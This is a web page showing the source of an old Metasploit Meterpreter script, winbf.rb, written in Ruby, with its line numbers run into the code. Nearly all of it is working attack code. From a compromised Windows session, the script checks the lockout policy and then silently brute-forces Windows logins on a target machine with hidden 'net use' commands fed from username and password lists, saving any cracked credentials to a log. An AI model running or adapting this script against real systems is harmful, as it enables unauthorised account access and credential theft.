Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/scripts/meterpreter/winbf.rb
Views: 11766
##1# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.2# If you'd like to improve this script, please try to port it as a post3# module instead. Thank you.4##567# Author: Carlos Perez at carlos_perez[at]darkoperator.com8#-------------------------------------------------------------------------------9################## Variable Declarations ##################10@@exec_opts = Rex::Parser::Arguments.new(11"-h" => [ false, "\tHelp menu."],12"-t" => [ true, "\tTarget IP Address"],13"-p" => [ true, "\tPassword List"],14"-c" => [ false, "\tCheck Local Machine Password Policy"],15"-L" => [ true, "\tUsername List to be brute forced"],16"-l" => [ true, "\tLogin name to be brute forced"]17)18# Variables for Options19user = []20ulopt = nil21userlist = nil22passlist = nil23target = nil24helpcall = 02526# The 'client' object holds the Meterpreter session27# Aliasing here for plugin compatibility28session = client2930################## Function Definition ##################31# Function for checking the password policy of current system.32# This policy may resemble the policy of other servers in the33#target environment.34def chkpolicy(session)35print_status("Checking password policy...")36output = []37begin38r = session.sys.process.execute("net accounts", nil, {'Hidden' => true, 'Channelized' => true})39while(d = r.channel.read)40output << d41end42r.channel.close43r.close44# Parsing output of net accounts45lockout = output.to_s.scan(/Lockout\sthreshold:\s*(\d*)/)46minpass = output.to_s.scan(/Minimum\spassword\slength:\s*(\d*)/)47failcount = output.to_s.scan(/Lockout\sobservation\swindow\s\(minutes\)\:\s*(\d*)/)48lcktime = output.to_s.scan(/Lockout\sduration\s\(minutes\)\:\s*(\d*)/)49# check for account lockout50if lockout.empty?51print_status "\tNo account lockout threshold configured"52else53print_status "\tWARNING Lockout threshold configured, if #{lockout} attempts in #{failcount} minutes account will be locked"54print_status "\tThe account will be locked out for #{lcktime}"55end56# check for password length57if minpass.to_s == "0"58print_status "\tNo minimum password length is configured"59else60print_status "\tThe minimum password length configured is #{minpass}"61print_status "\tyour dictionary should start with passwords of #{minpass} length"62end63rescue ::Exception => e64print_status("The following Error was encountered: #{e.class} #{e}")65end66end67#--------------------------------------------------------6869# Function for brute forcing passwords using windows native tools70def passbf(session,passlist,target,user,opt,logfile)71print_status("Running Brute force attack against #{user}")72print_status("Successful Username and Password pairs are being saved in #{logfile}")73result = []74output = []75passfnd = 076a = []77i = 078if opt == 179if not ::File.exist?(user)80raise "Usernames List File does not exist!"81else82user = ::File.open(user, "r")83end84end85# Go thru each user86user.each do |u|87# Go thru each line in the password file88while passfnd < 189::File.open(passlist, "r").each_line do |line|90begin91print_status("Trying #{u.chomp} #{line.chomp}")9293# Command for testing local login credentials94r = session.sys.process.execute("cmd /c net use \\\\#{target} #{line.chomp} /u:#{u.chomp}", nil, {'Hidden' => true, 'Channelized' => true})95while(d = r.channel.read)96output << d97end98r.channel.close99r.close100101# Checks if password is found102result = output.to_s.scan(/The\scommand\scompleted\ssuccessfully/)103if result.length == 1104print_status("\tUser: #{u.chomp} pass: #{line.chomp} found")105file_local_write(logfile,"User: #{u.chomp} pass: #{line.chomp}")106r = session.sys.process.execute("cmd /c net use \\\\#{target} /delete", nil, {'Hidden' => true, 'Channelized' => true})107while(d = r.channel.read)108output << d109end110output.clear111r.channel.close112r.close113passfnd = 1114break115end116rescue ::Exception => e117print_status("The following Error was encountered: #{e.class} #{e}")118end119120end121passfnd = 1122end123passfnd = 0124end125end126127#--------------------------------------------------------128# Function for creating log file129def logme(target)130131# Create Filename info to be appended to files132filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")133134# Create a directory for the logs135logs = ::File.join(Msf::Config.log_directory,'scripts', 'winbf')136137# Create the log directory138::FileUtils.mkdir_p(logs)139140#logfile name141dest = logs + "/" + target + filenameinfo142143dest144end145#--------------------------------------------------------146#147##check for proper Meterpreter Platform148def unsupported149print_error("This version of Meterpreter is not supported with this Script!")150raise Rex::Script::Completed151end152unsupported if client.platform != 'windows'153154################## MAIN ##################155156# Parsing of Options157@@exec_opts.parse(args) { |opt, idx, val|158case opt159when "-l"160user << val161ulopt = 0162when "-L"163userlist = val164ulopt = 1165166when "-c"167chkpolicy(session)168exit169when "-p"170171passlist = val172if not ::File.exist?(passlist)173raise "Password File does not exist!"174end175when "-t"176target = val177when "-h"178print("Windows Login Brute Force Meterpreter Script\n" +179"Usage:\n" +180@@exec_opts.usage)181helpcall = 1182end183184}185186# Execution of options selected187if user.length > 0 && passlist != nil && target != nil188189passbf(session,passlist,target,user,ulopt,logme(target))190191elsif userlist != nil && passlist != nil && target != nil192193passbf(session,passlist,target,userlist,ulopt,logme(target))194195elsif helpcall == 0196print("Windows Login Brute Force Meterpreter Script\n" +197"Usage:\n" +198@@exec_opts.usage)199200end201202203204